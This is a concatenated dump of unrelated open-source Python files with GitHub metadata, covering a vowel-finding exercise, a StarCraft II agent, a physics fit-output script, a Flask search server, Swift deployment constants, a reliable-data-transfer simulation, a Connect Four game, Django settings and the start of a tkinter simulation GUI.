a914ff8c2d0018797ec75f0eb379efac9c21abef | c0a5ff5f77943a9529512e6b27148f3318ab5264 | /vowels2.py | 9fe9e3f321664f0f5ebedae52821be5fdb7ac104 | [] | no_license | smatthewenglish/head_first_python | b15cc7260fa6607759778ac37d86006f803462a9 | 6e783ce541d5462fb2f84cc901c713fcf5895240 | refs/heads/master | 2023-03-28T14:50:16.857613 | 2021-03-31T16:41:14 | 2021-03-31T16:41:14 | 350,149,656 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 287 | py | vowels = ['a', 'e', 'i', 'o', 'u']
#word = "Milliways"
word = input("Provide a word to search for vowels: ")
found = []
for letter in word:
if letter in vowels:
#print(letter)
if letter not in found:
found.append(letter)
for vowel in found:
print(vowel)
| [
"s.matthew.english@gmail.com"
] | s.matthew.english@gmail.com |
98d75dde25a21b1325e302fb99136e29ebb46c53 | c22b511dfa356330ba2e90ee098c929580d18543 | /UnitLog/simple_agent.py | cd41978e67bf0018ec2e008c1d63fbbb0464b4e7 | [] | no_license | malinipathakota/Dynamic-Army-Prediction | 735ce09115223b872bb474fbcdd09065992014eb | 31cdf2029a15bb0e098309aa877d0b854ca7c4d1 | refs/heads/master | 2020-03-22T02:04:22.037907 | 2018-06-08T17:59:17 | 2018-06-08T17:59:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,449 | py | from pysc2.agents import base_agent
from pysc2.lib import actions
from pysc2.lib import features
import math
import time
# This program tells the amount of supply depots there are on the current screen using pysc2
# basic code from https://chatbotslife.com/building-a-basic-pysc2-agent-b109cde1477c
# Functions
_BUILD_SUPPLYDEPOT = actions.FUNCTIONS.Build_SupplyDepot_screen.id
_NOOP = actions.FUNCTIONS.no_op.id
_SELECT_POINT = actions.FUNCTIONS.select_point.id
# Features
_PLAYER_RELATIVE = features.SCREEN_FEATURES.player_relative.index
_UNIT_TYPE = features.SCREEN_FEATURES.unit_type.index
# Unit IDs
_TERRAN_COMMANDCENTER = 18
_TERRAN_SUPPLYDEPOT = 19
_TERRAN_SCV = 45
# Parameters
_PLAYER_SELF = 1
_NOT_QUEUED = [0]
_QUEUED = [1]
class SimpleAgent(base_agent.BaseAgent):
base_top_left = None
supply_depot_built = False
scv_selected = False
def transformLocation(self, x, x_distance, y, y_distance):
if not self.base_top_left:
return [x - x_distance, y - y_distance]
return [x + x_distance, y + y_distance]
def step(self, obs):
super(SimpleAgent, self).step(obs)
time.sleep(0.5)
_UNIT_TYPE = features.SCREEN_FEATURES.unit_type.index
unit_type = obs.observation['screen'][_UNIT_TYPE]
depot_y, depot_x = (unit_type == _TERRAN_SUPPLYDEPOT).nonzero()
#69 pixels in 1 depot
depot_count = int(math.ceil(len(depot_y) / 69))
print("There are " , depot_count , " depots")
if self.base_top_left is None:
player_y, player_x = (obs.observation["minimap"][_PLAYER_RELATIVE] == _PLAYER_SELF).nonzero()
self.base_top_left = player_y.mean() <= 31
if not self.supply_depot_built:
if not self.scv_selected:
unit_type = obs.observation["screen"][_UNIT_TYPE]
unit_y, unit_x = (unit_type == _TERRAN_SCV).nonzero()
target = [unit_x[0], unit_y[0]]
self.scv_selected = True
return actions.FunctionCall(_SELECT_POINT, [_NOT_QUEUED, target])
elif _BUILD_SUPPLYDEPOT in obs.observation["available_actions"]:
unit_type = obs.observation["screen"][_UNIT_TYPE]
unit_y, unit_x = (unit_type == _TERRAN_COMMANDCENTER).nonzero()
target = self.transformLocation(int(unit_x.mean()), 0, int(unit_y.mean()), 20)
self.supply_depot_built = True
return actions.FunctionCall(_BUILD_SUPPLYDEPOT, [_NOT_QUEUED, target])
return actions.FunctionCall(actions.FUNCTIONS.no_op.id, []) | [
"noreply@github.com"
] | malinipathakota.noreply@github.com |
bf7cccfc45cdf2461987920d5a0b5fcb107fe227 | 5488617b1b05c436b1f8c8642ea75ca754719f8d | /TW_study/LimitCode/tW_measurment/mlfitNormsToText.py | 7cbfc9933869090ddc8caf40ffac104930662672 | [] | no_license | wenxingfang/TW_Top | fdb1ba136be6ace8fdacaade58cb4ca4fcdc3c9e | 389e76c904d08a59d9141b9b66ec15d2583f8e9a | refs/heads/master | 2021-02-05T06:54:27.908688 | 2020-02-28T13:24:00 | 2020-02-28T13:24:00 | 243,754,087 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,037 | py | import re
from sys import argv, stdout, stderr, exit
# import ROOT with a fix to get batch mode (http://root.cern.ch/phpBB3/viewtopic.php?t=3198)
argv.append( '-b-' )
import ROOT
ROOT.gROOT.SetBatch(True)
argv.remove( '-b-' )
if len(argv) == 0: raise RuntimeError, "Usage: mlfitNormsToText.py [ -u ] mlfit.root";
errors = False
if len(argv) > 2 and argv[1] == "-u":
errors = True
argv[1] = argv[2];
file = ROOT.TFile.Open(argv[1]);
prefit = file.Get("norm_prefit")
fit_s = file.Get("norm_fit_s")
fit_b = file.Get("norm_fit_b")
if prefit == None: stderr.write("Missing fit_s in %s. Did you run MaxLikelihoodFit in a recent-enough version of combine and with --saveNorm?\n" % file);
if fit_s == None: raise RuntimeError, "Missing fit_s in %s. Did you run MaxLikelihoodFit with --saveNorm?" % file;
if fit_b == None: raise RuntimeError, "Missing fit_b in %s. Did you run MaxLikelihoodFit with --saveNorm?" % file;
iter = fit_s.createIterator()
while True:
norm_s = iter.Next()
if norm_s == None: break;
norm_b = fit_b.find(norm_s.GetName())
norm_p = prefit.find(norm_s.GetName()) if prefit else None
m = re.match(r"(\w+)/(\w+)", norm_s.GetName());
if m == None: m = re.match(r"n_exp_(?:final_)?(?:bin)+(\w+)_proc_(\w+)", norm_s.GetName());
if m == None: raise RuntimeError, "Non-conforming object name %s" % norm_s.GetName()
if norm_b == None: raise RuntimeError, "Missing normalization %s for background fit" % norm_s.GetName()
if prefit and norm_p and errors:
print "%-30s %-30s %7.3f +/- %7.3f %7.3f +/- %7.3f %7.3f +/- %7.3f" % (m.group(1), m.group(2), norm_p.getVal(), norm_p.getError(), norm_s.getVal(), norm_s.getError(), norm_b.getVal(), norm_b.getError())
else:
if errors:
print "%-30s %-30s %7.3f +/- %7.3f %7.3f +/- %7.3f" % (m.group(1), m.group(2), norm_s.getVal(), norm_s.getError(), norm_b.getVal(), norm_b.getError())
else:
print "%-30s %-30s %7.3f %7.3f" % (m.group(1), m.group(2), norm_s.getVal(), norm_b.getVal())
| [
"wenxing.fang@cern.ch"
] | wenxing.fang@cern.ch |
3457167f9bc213fb29f4f31b0efb6fcb0b083d73 | 593801aa67c0d804836eb064fdffce1da7be1f1c | /server.py | 7f6d86f84e9d5d80e6d591f9c5af930c6efab6de | [] | no_license | tzembo/la-gregueria-virtual | bd91c29d966ae6fd015eca356b53348cff2a1e00 | 3ea50e7c83f22eb3ce1648e98fa1882eead0da82 | refs/heads/master | 2019-07-18T13:53:59.876636 | 2018-06-21T22:54:58 | 2018-06-21T22:54:58 | 116,059,695 | 2 | 1 | null | 2018-06-18T22:41:14 | 2018-01-02T21:38:26 | Python | UTF-8 | Python | false | false | 4,645 | py | # server.py
import os
import urllib
import signal
from werkzeug.contrib.fixers import ProxyFix
from pymongo import MongoClient
from bson.objectid import ObjectId
from flask import Flask, render_template, jsonify, json, request, Response
from flask_cors import CORS
from collections import Counter
from whoosh.index import open_dir
from whoosh.query import Term, Every, NumericRange
from whoosh.qparser import QueryParser, OrGroup
from whoosh.analysis import LanguageAnalyzer
from whoosh.highlight import Formatter, get_text, WholeFragmenter
app = Flask(__name__, static_folder="build", template_folder="build")
CORS(app)
app.wsgi_app = ProxyFix(app.wsgi_app)
# connect to MongoDB database
# client = MongoClient('localhost:27017')
# db = client.GregueriasData
# customize highlight formatter
class HighlightFormatter(Formatter):
def format_token(self, text, token, replace=False):
# Use the get_text function to get the text corresponding to the
# token
tokentext = get_text(text, token, replace)
# Return the text as you want it to appear in the highlighted
# string
return "<mark>%s<mark>" % tokentext
hf = HighlightFormatter() # formatter for highlighting
wf = WholeFragmenter() # fragmenter for splitting words
es_ana = LanguageAnalyzer("es") # Whoosh analyzer for Spanish
# Load Whoosh index
index = open_dir("whoosh_index")
# Initialize Whoosh parser
parser = QueryParser("text", schema=index.schema)
@app.route("/")
def load_index():
return render_template("index.html")
@app.route("/api/greguerias/all/", methods=['GET'])
def get_all_greguerias():
try:
results_list = []
q = Every() # Whoosh query for returning all items
with index.searcher() as searcher:
results = searcher.search(q, limit=None)
for hit in results:
result_item = {
"id": hit["id"],
"text": hit["text"],
"tags": hit["tags"],
"wc": hit["wc"],
"x": hit["x"],
"y": hit["y"]
}
results_list.append(result_item)
except Exception as e:
return str(e)
else:
return jsonify({"results": results_list})
@app.route("/api/greguerias", methods=['GET'])
def search():
query = []
fulltext = request.args.get('fulltext')
if fulltext:
query.append(urllib.parse.unquote(fulltext))
wcmin = request.args.get('wcmin', '')
wcmax = request.args.get('wcmax', '')
if wcmin or wcmax:
if (wcmin):
wcmin = wcmin + ' '
if (wcmax):
wcmax = ' ' + wcmax
query.append("wc:[{}TO{}]".format(wcmin, wcmax))
tags = request.args.get('tags')
if tags:
parsed_tags = tags.split(',')
query.append("tags:(" + ' '.join(parsed_tags) + ")")
print(' '.join(query))
q = parser.parse(' '.join(query))
with index.searcher() as searcher:
results = searcher.search(q, limit=None)
results.fragmenter = wf
results.formatter = hf
results_list = []
print(q)
for hit in results:
print(hit.highlights("text"))
result_item = {
"id": hit["id"],
"text": hit.highlights("text"),
"tags": hit["tags"],
"wc": hit["wc"],
"x": hit["x"],
"y": hit["y"]
}
results_list.append(result_item)
print(results_list)
return jsonify({"results": results_list})
@app.route('/api/gregueria/<gregueria_id>', methods=['GET'])
def get_gregueria_by_id(gregueria_id):
try:
sim_list = []
with index.searcher() as searcher:
docnum = searcher.document_number(id=gregueria_id)
result = searcher.stored_fields(docnum)
similar_results = searcher.more_like(docnum, "text")
for hit in similar_results:
sim_item = {
"id": hit["id"],
"text": hit["text"],
"tags": hit["tags"],
"wc": hit["wc"]
}
sim_list.append(sim_item)
ret = {"gregueria": result, "similar_greguerias": sim_list}
except Exception as e:
return str(e)
return jsonify(ret)
@app.route('/<path:path>')
def catch_all(path):
return render_template("index.html")
if __name__ == "__main__":
app.run(host='0.0.0.0')
| [
"tzembowicz@gmail.com"
] | tzembowicz@gmail.com |
198b5ae58b68d8062d33db60461450c901fe992a | 801d00870b888b6905423071c0bdf79f0847242e | /swiftst/consts.py | 65265b70edfbd36b896b7ee4ac7bc223b6dee925 | [
"Apache-2.0"
] | permissive | btorch/swift-setuptools | de297810d7227f24eef61054cfdd94cf8684252a | 15e6e134a00b2ce70456a19e938e1b9d696a3762 | refs/heads/master | 2021-11-30T04:01:26.544397 | 2013-05-09T20:56:21 | 2013-05-09T20:56:21 | 9,222,221 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,352 | py | """ See COPYING for license information. """
'''
Some parameters that are passed over on apt-get installs
'''
apt_opts = ' -y -qq --force-yes -o Dpkg::Options::=--force-confdef '
'''
Keyring packages that might be needed
'''
keyrings = ['ubuntu-cloud-keyring']
'''
Utilities that will be install on all systems by the common setup
'''
general_tools = ['python-software-properties', 'patch', 'debconf',
'bonnie++', 'dstat', 'python-configobj', 'curl',
'subversion', 'git-core', 'iptraf', 'htop', 'syslog-ng',
'nmon', 'strace', 'iotop', 'debsums', 'python-pip',
'snmpd', 'snmp', 'bsd-mailx', 'xfsprogs', 'ntp',
'snmp-mibs-downloader', 'exim4']
'''
Dictionary that contains system:packages that will be installed
for swift according to each system functionality
'''
packages = {'generic': ['swift', 'python-swift', 'python-swiftclient'],
'proxy': ['swift-proxy', 'python-keystone',
'python-keystoneclient', 'memcached', 'python-memcache'],
'storage': ['swift-account', 'swift-container', 'swift-object'],
'saio': ['swift-proxy', 'swift-account', 'swift-container',
'swift-object', 'python-keystone',
'python-keystoneclient', 'memcached',
'python-memcache'],
'other': ['python-suds', 'python-slogging']
}
'''
This is a dictionary that matches the template files that have
placeholders with the keywords that need to be replacted by what
has been set in the configuration file. The keywords below must
match the keys in the configuration file. The only difference is
that they will be lowecase in the configuration file.
'''
templates = {'common/etc/aliases': ('EMAIL_ADDR', 'PAGER_ADDR'),
'common/etc/exim4/update-exim4.conf.conf': ('OUTGOING_DOMAIN',
'SMARTHOST'),
'common/etc/cron.d/swift_ring_check': ('RINGSERVER_IP', ),
'common/etc/swift/swift.conf': ('SWIFT_HASH', ),
'common/etc/syslog-ng/conf.d/swift-syslog-ng.conf': ('SYSLOGS_IP', ),
'proxy/etc/memcached.conf': ('MEMCACHE_MAXMEM', 'SIM_CONNECTIONS'),
'proxy/etc/swift/memcache.conf': ('MEMCACHE_SERVER_LIST', ),
'proxy/etc/swift/proxy-server.conf': ('KEYSTONE_IP',
'KEYSTONE_PORT',
'KEYSTONE_AUTH_PROTO',
'KEYSTONE_AUTH_URI',
'KEYSTONE_ADMIN_TENANT',
'KEYSTONE_ADMIN_USER',
'KEYSTONE_ADMIN_KEY',
'INFORMANT_IP'),
'admin/etc/swift/dispersion.conf': ('KEYSTONE_AUTH_URI',
'KEYSTONE_ADMIN_TENANT',
'KEYSTONE_ADMIN_USER',
'KEYSTONE_ADMIN_KEY'),
'storage/usr/local/bin/drive_mount_check.py': ('OUTGOING_DOMAIN',
'EMAIL_ADDR')}
| [
"btorch@gmail.com"
] | btorch@gmail.com |
94d670a97b05e7dffb5001190db431bae350249c | 11c423e8db58794e6c4b27526914b0edf3d20691 | /Favorite Movie.py | d2ea33237dd2374e6ca148695cc13fd5fb1bf422 | [] | no_license | FrantzL-Cyber/Unit_1 | 29adcedc4828184799628cf8f4633d6cefe4fef6 | 7426e4ebbf57b4398f7c0f961f53af28d14b77a7 | refs/heads/master | 2020-08-11T12:25:47.454492 | 2019-10-12T02:41:08 | 2019-10-12T02:41:08 | 214,564,743 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 154 | py | fav = input("What is your favorite movie?")
def favorite_movie(n):
print("Wow my favorite movie is also " + n)
favorite_movie(fav)
| [
"noreply@github.com"
] | FrantzL-Cyber.noreply@github.com |
890a6c845ba68e91d44b1354ba3d62efa680e5ae | 890eee7b41d555c6e05ee28fb52ecb281bbde7fb | /HW10/hw10pr2.py | 43577999684613be97ea0f6fead483b5b37b62d6 | [] | no_license | Austin-Long/CS5 | e42e0f154122967150a1eb4112d9aaadd39a59b2 | 92a98ae59a02050a707ed514389560ca26cf6b97 | refs/heads/master | 2020-03-28T08:23:46.405771 | 2018-12-17T04:16:38 | 2018-12-17T04:16:38 | 147,895,963 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,393 | py | #
# hw10pr2.py
#
# Name: Austin Long
#
def inarow_Neast(ch, r_start, c_start, A, N):
"""Starting from (row, col) of (r_start, c_start)
within the 2d list-of-lists A (array),
returns True if there are N ch's in a row
heading east and returns False otherwise.
"""
H = len(A)
W = len(A[0])
if r_start < 0 or r_start > H - 1:
return False # out of bounds row
if c_start < 0 or c_start + (N-1) > W - 1:
return False # o.o.b. col
# loop over each location _offset_ i
for i in range(N):
if A[r_start][c_start+i] != ch: # a mismatch!
return False
return True # all offsets succeeded, so we return True
def inarow_Nsouth(ch, r_start, c_start, A, N):
"""Starting from (row, col) of (r_start, c_start)
within the 2d list-of-lists A (array),
returns True if there are N ch's in a row
heading south and returns False otherwise.
"""
H = len(A)
W = len(A[0])
if r_start < 0 or r_start + (N-1) > H - 1:
return False # out of bounds row
if c_start < 0 or c_start > W - 1:
return False # o.o.b. col
# loop over each location _offset_ i
for i in range(N):
if A[r_start+i][c_start] != ch: # a mismatch!
return False
return True # all offsets succeeded, so we return True
def inarow_Nnortheast(ch, r_start, c_start, A, N):
"""Starting from (row, col) of (r_start, c_start)
within the 2d list-of-lists A (array),
returns True if there are N ch's in a row
heading northeast and returns False otherwise.
"""
H = len(A)
W = len(A[0])
if r_start - (N-1) < 0 or r_start > H - 1:
return False # out of bounds row
if c_start < 0 or c_start + (N-1) > W - 1:
return False # o.o.b. col
# loop over each location _offset_ i
for i in range(N):
if A[r_start-i][c_start+i] != ch: # a mismatch!
return False
return True # all offsets succeeded, so we return True
def inarow_Nsoutheast(ch, r_start, c_start, A, N):
"""Starting from (row, col) of (r_start, c_start)
within the 2d list-of-lists A (array),
returns True if there are N ch's in a row
heading southeast and returns False otherwise.
"""
H = len(A)
W = len(A[0])
if r_start < 0 or r_start + (N-1) > H - 1:
return False # out of bounds row
if c_start < 0 or c_start + (N-1) > W - 1:
return False # o.o.b. col
# loop over each location _offset_ i
for i in range(N):
if A[r_start+i][c_start+i] != ch: # a mismatch!
return False
return True # all offsets succeeded, so we return True
class Board:
"""A data type representing a Connect-4 board
with an arbitrary number of rows and columns.
"""
def __init__(self, width, height):
"""Construct objects of type Board, with the given width and height."""
self.width = width
self.height = height
self.data = [[' ']*width for row in range(height)]
# We do not need to return anything from a constructor!
def __repr__(self):
"""This method returns a string representation
for an object of type Board.
"""
s = '' # the string to return
for row in range(0, self.height):
s += '|'
for col in range(0, self.width):
s += self.data[row][col] + '|'
s += '\n'
s += (2*self.width + 1) * '-' # bottom of the board
# and the numbers underneath here
return s # the board is complete, return it
def addMove(self, col, ox):
"""Drops a check into the board, accepts two arguments:
the col and the one character string 'X' or 'O'
"""
for i in range(self.height):
if self.data[i][col] != " ":
self.data[i-1][col] = ox
return
self.data[self.height-1][col] = ox
def clear(self):
"""clears the board that calls it"""
for row in range(self.height):
self.data =[" "]*self.width
def setBoard(self, moveString):
"""Accepts a string of columns and places
alternating checkers in those columns,
starting with 'X'.
For example, call b.setBoard('012345')
to see 'X's and 'O's alternate on the
bottom row, or b.setBoard('000000') to
see them alternate in the left column.
moveString must be a string of one-digit integers.
"""
nextChecker = 'X' # start by playing 'X'
for colChar in moveString:
col = int(colChar)
if 0 <= col <= self.width:
self.addMove(col, nextChecker)
if nextChecker == 'X':
nextChecker = 'O'
else:
nextChecker = 'X'
def allowsMove(self, c):
"""returns True if the calling object does allow a move into column c
Returns False if c is not a legal column number, and if c is full
"""
if c < 0 or c >= self.width:
return False
elif self.data[0][c] != " ":
return False
else:
return True
def isFull(self):
"""returns True if the calling object is completely full of checkers. False
otherwise
"""
for c in range(self.width):
if self.allowsMove(c) == True:
return False
return True
def delMove(self, c):
"""removes the top checker from the column c, if the column is empty, then
do nothing
"""
for i in range(self.height):
if self.data[i][c] != " ":
self.data[i][c] = " "
return
def winsFor(self, ox):
"""returns True if there are four checkers of type ox in a row on the
board, False otherwise
Accepts: a 1-character checker, either 'O' or 'X'
"""
for i in range(self.height):
for j in range(self.width):
if inarow_Neast(ox, i, j, self.data, 4) or \
inarow_Nnortheast(ox, i, j, self.data, 4) or \
inarow_Nsouth(ox, i, j, self.data, 4) or \
inarow_Nsoutheast(ox, i, j, self.data, 4):
return True
return False
def hostGame(self):
"""hosts a game of connect for, 'X' will always go first"""
print("Welcome to Connect Four! \n")
print(self)
a = 1
b = 1
while a == b:
users_col = -1
while not self.allowsMove(users_col):
users_col = int(input("Choose a column(X): "))
self.addMove(users_col, 'X')
print(self)
if self.winsFor('X'):
print("Player X gets the Win!")
return
if self.isFull():
print('tie')
return
users_col = -1
while not self.allowsMove(users_col):
users_col = int(input("Choose a column(O): "))
self.addMove(users_col, 'O')
print(self)
if self.winsFor('O'):
print('Player O Wins!')
return
if self.isFull():
print('tie')
return
| [
"austinlong@MacBook-Pro-71.local"
] | austinlong@MacBook-Pro-71.local |
1f4f463c6c68e936a859a188ff56cc5981359f27 | af70590e2e8d75f6db76715bfe6f09f4334c25e6 | /app/src/domains/auth/model/auth.py | 805b868353ed4948730d03dd3eaa478a9f01bc14 | [] | no_license | gfpaiva/wishlist-api | 6c3472cfc84bc8da43b60c948f1b1a72d5711aca | 41aa43a7b1f182836cc40e5be9a68c565a748893 | refs/heads/main | 2023-01-22T07:59:34.856988 | 2020-12-07T02:18:12 | 2020-12-07T02:18:12 | 306,745,071 | 0 | 0 | null | 2020-12-07T02:18:14 | 2020-10-23T20:54:51 | Python | UTF-8 | Python | false | false | 412 | py | from peewee import (
Model,
CharField,
)
from src.infra.db import db
class Auth(Model):
"""
Model for user/app authentication in database. With fields id, username
and password
"""
id = CharField(primary_key=True, null=False)
username = CharField(null=False, unique=True)
password = CharField(null=False)
class Meta:
table_name = 'auths'
database = db
| [
"gf.paiva@yahoo.com.br"
] | gf.paiva@yahoo.com.br |
6b2724dbc3431852c9166f9410166bac898f52e3 | feb7437e96a24893b3473e24fbba075681f3c605 | /flightproject/flightproject/settings.py | 8cc0b5f1b6707c50408a8ea867682ca1a568aad7 | [] | no_license | msatyam832/Flight-Reservation-System | 01a8aaa8743e6407d353cf9a35c719e6a198b363 | 1847bf3715dd937df46568afc357930c6913568c | refs/heads/master | 2023-02-24T08:49:30.640620 | 2021-02-01T06:33:32 | 2021-02-01T06:33:32 | 330,865,209 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,242 | py | """
Django settings for flightproject project.
Generated by 'django-admin startproject' using Django 3.1.3.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'nhu^s8t4%i-xi5lkl9b=)6w3y17$6+g)1v$7e_%ad^e=9@cssr'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'flightapp',
'rest_framework'
,
]
REST_FRAMEWORK={
'DEFAULT_PAGINATION_CLASS':'rest_framework.pagination.PageNumberPagination',
'PAGE_SIZE':2
}
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'flightproject.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'flightproject.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
| [
"satyamkumar@univisiontechnocon.com"
] | satyamkumar@univisiontechnocon.com |
234f9d0be069bd885e1b1e25db82bd2eb4e0e97e | d765d19f80a6bfed71685838306f2d91f6a5a7dd | /rdt/rdt21.py | 0c2bba984d0b3daf478d990edda454a24d739487 | [] | no_license | EliasFarhan/CompNet | 1f1f83e6babdb688e1d626117cdb50a642a9d2a9 | c95b36c12a7a0a0d0ac5ecdb41e1b227c3973de0 | refs/heads/master | 2021-07-16T20:33:56.803384 | 2020-09-15T18:54:18 | 2020-09-15T18:54:18 | 210,541,643 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,839 | py | from rdt.base import *
from rdt.rdt20 import ChannelRdt20
class SenderRdt21(Sender):
last_packet = ""
sequence_nmb = 1
msg_lock = threading.Lock()
def send_data(self, data, resend=False):
if not resend:
self.msg_lock.acquire()
self.last_packet = data
text_data = data.encode()
packet = bytearray(len(text_data) + 2)
packet[1] = self.sequence_nmb.to_bytes(8, byteorder='little')[0]
check_sum = 0
for byte in text_data:
check_sum += byte
check_sum += packet[1]
packet[0] = check_sum.to_bytes(8, byteorder="little")[0]
packet[2:len(text_data) + 2] = text_data
self.channel.send_msg(packet)
def receive_response(self, response):
check_sum = 0
for byte in response[0:2]:
check_sum += byte
if check_sum.to_bytes(8, byteorder='little')[0] != response[3]:
print("[Error] Bad response checksum : need to send the last packet again: "+self.last_packet)
self.send_data(self.last_packet, resend=True)
return
if b"ACK" in response:
print("[ACK] Packet went well")
self.sequence_nmb += 1
self.msg_lock.release()
elif b"NAK" in response:
print("[NAK] Need to send packet again")
self.send_data(self.last_packet, resend=True)
else:
print("[Error] Bad response : need to send the last packet again")
self.send_data(self.last_packet, resend=True)
class ReceiverRdt21(Receiver):
sequence_number = 0
def receive_data(self, data):
check_sum = data[0]
sequence_nmb = data[1]
text_data = data[2:]
byte_sum = 0
response = bytearray(4)
for byte in text_data:
byte_sum += byte
byte_sum += sequence_nmb
if byte_sum.to_bytes(8, byteorder="little")[0] == check_sum:
if self.sequence_number != sequence_nmb:
super().receive_data(text_data)
self.sequence_number = sequence_nmb
response[0:2] = b"ACK"
byte_sum = 0
for byte in response[0:2]:
byte_sum += byte
response[3] = byte_sum.to_bytes(8, byteorder='little')[0]
self.send_response(response)
else:
response[0:2] = b"NAK"
byte_sum = 0
for byte in response[0:2]:
byte_sum += byte
response[3] = byte_sum.to_bytes(8, byteorder='little')[0]
self.send_response(response)
def send_response(self, response):
super().send_response(response)
def main():
sim = Simulation(sender=SenderRdt21(), channel=ChannelRdt20(), receiver=ReceiverRdt21())
sim.simulate()
if __name__ == "__main__":
main()
| [
"elias.farhan@gmail.com"
] | elias.farhan@gmail.com |
901c2725f19e802f0cfd00ad38118bb3d1511a0c | 6490638f15a2dfbe0cec9725186f9784d57c92f0 | /SPACEUI/SPACEgui.py | 18a2f4d304f7717a4741a891fc0f833466a08ac4 | [
"MIT"
] | permissive | khawatkom/SpacePyLibrary | af9c490ef796b9d37a13298c41df1fb5bf6b3cee | c94415e9d85519f345fc56938198ac2537c0c6d0 | refs/heads/master | 2020-05-14T21:52:39.388979 | 2019-04-17T17:06:04 | 2019-04-17T17:06:04 | 181,970,668 | 1 | 0 | null | 2019-04-17T21:26:44 | 2019-04-17T21:26:44 | null | UTF-8 | Python | false | false | 33,911 | py | #******************************************************************************
# (C) 2018, Stefan Korner, Austria *
# *
# The Space Python Library is free software; you can redistribute it and/or *
# modify it under under the terms of the MIT License as published by the *
# Massachusetts Institute of Technology. *
# *
# The Space Python Library is distributed in the hope that it will be useful, *
# but WITHOUT ANY WARRANTY; without even the implied warranty of *
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the MIT License *
# for more details. *
#******************************************************************************
# Space Segment Simulation GUI *
#******************************************************************************
import tkinter
from tkinter import filedialog, simpledialog
from UTIL.SYS import Error, LOG, LOG_INFO, LOG_WARNING, LOG_ERROR
import SCOS.ENV
import SPACE.IF
import UI.TKI
import UTIL.TIME
#############
# constants #
#############
COLOR_BUTTON_FG = "#FFFFFF"
COLOR_BUTTON_BG = "#808080"
COLOR_INITIALISED = "#FFFF00"
COLOR_CONNECTED = "#00FF00"
COLOR_ON_OK = "#00FF00"
COLOR_ON_NOK = "#FF0000"
###########
# classes #
###########
# =============================================================================
class TMpacketDetails(tkinter.Frame, UI.TKI.AppGrid):
"""Displays the packet details, implemented as tkinter.Frame"""
# ---------------------------------------------------------------------------
def __init__(self, master):
tkinter.Frame.__init__(self, master, relief=tkinter.GROOVE, borderwidth=1)
# --- filler ---
filler = tkinter.Label(self)
self.appGrid(filler, row=0, columnspan=2, rowweight=0)
# packet name
self.pktNameField = UI.TKI.ValueField(self, row=1, label="Packet name:")
# packet description
self.pktDescrField = UI.TKI.ValueField(self, row=2, label="Packet description:")
# SPID
self.pktSPIDfield = UI.TKI.ValueField(self, row=3, label="Packet SPID:")
# APID
self.pktAPIDfield = UI.TKI.ValueField(self, row=4, label="Packet APID:")
# Type
self.pktTypeField = UI.TKI.ValueField(self, row=5, label="Packet Type:")
# Subtype
self.pktSubtypeField = UI.TKI.ValueField(self, row=6, label="Packet Subtype:")
# PI1
self.pktPI1field = UI.TKI.ValueField(self, row=7, label="Packet PI1:")
# PI2
self.pktPI2field = UI.TKI.ValueField(self, row=8, label="Packet PI2:")
# --- parameter listbox ---
label = tkinter.Label(self, text="Parameters")
self.appGrid(label, row=0, column=2, rowweight=0)
self.parametersListbox = UI.TKI.ScrolledListbox(self, selectmode=tkinter.SINGLE)
self.appGrid(self.parametersListbox, row=1, column=2, rowspan=8, rowweight=0, columnweight=1)
# --- filler ---
filler = tkinter.Label(self)
self.appGrid(filler, row=9, columnspan=3, rowweight=0)
# parameter names
self.parameterNamesField = UI.TKI.InputField(self, row=10, label="Parameter names: optional")
self.appGrid(self.parameterNamesField.field, row=10, column=1, columnspan=2, rowweight=0)
# parameter values
self.parameterValuesField = UI.TKI.InputField(self, row=11, label="Parameter value: optional")
self.appGrid(self.parameterValuesField.field, row=11, column=1, columnspan=2, rowweight=0)
